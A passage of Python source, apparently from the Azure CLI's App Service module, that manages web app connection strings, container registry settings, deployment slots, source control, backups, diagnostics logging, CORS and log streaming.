if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
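# Container settings are stored as regular app settings plus the linux_fx_version site config;
# the helpers below keep the two in sync and mask credential values on output.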
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must provide both --multicontainer-config-file FILE and --multicontainer-config-type TYPE to update the multicontainer configuration')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
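# Resolve ACR admin credentials by locating the registry anywhere in the subscription;
# requires the registry's admin user to be enabled.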
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
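# Slot creation: the new slot starts with an empty SiteConfig; when a configuration source is
# given, site config, app settings and connection strings are cloned afterwards, and
# slot-sticky settings are excluded from the clone.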
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
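# Source control configuration: the VSTS continuous-delivery path is used when cd_project_url
# is provided; otherwise a plain SiteSourceControl binding (git or mercurial) is created, with
# retries to ride out temporary SCM site shutdowns.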
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('The following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
import time
ex = ex_handler_factory(no_throw=True)(ex)
# for non-server errors (not 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
location=None, tags=None):
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
from datetime import datetime
backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
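# Frequency strings have the form '<number><unit>' where the unit is 'd' (day) or 'h' (hour),
# e.g. '1d' or '12h'.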
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve the SCM URL')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be implemented later.
# Tracked as Issue #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 MB max log size, retention lasts 3 days. Yes, we hard-code it; the portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
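# each distribution entry has the form '<slot>=<percentage>', e.g. 'staging=50'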
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
import time
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
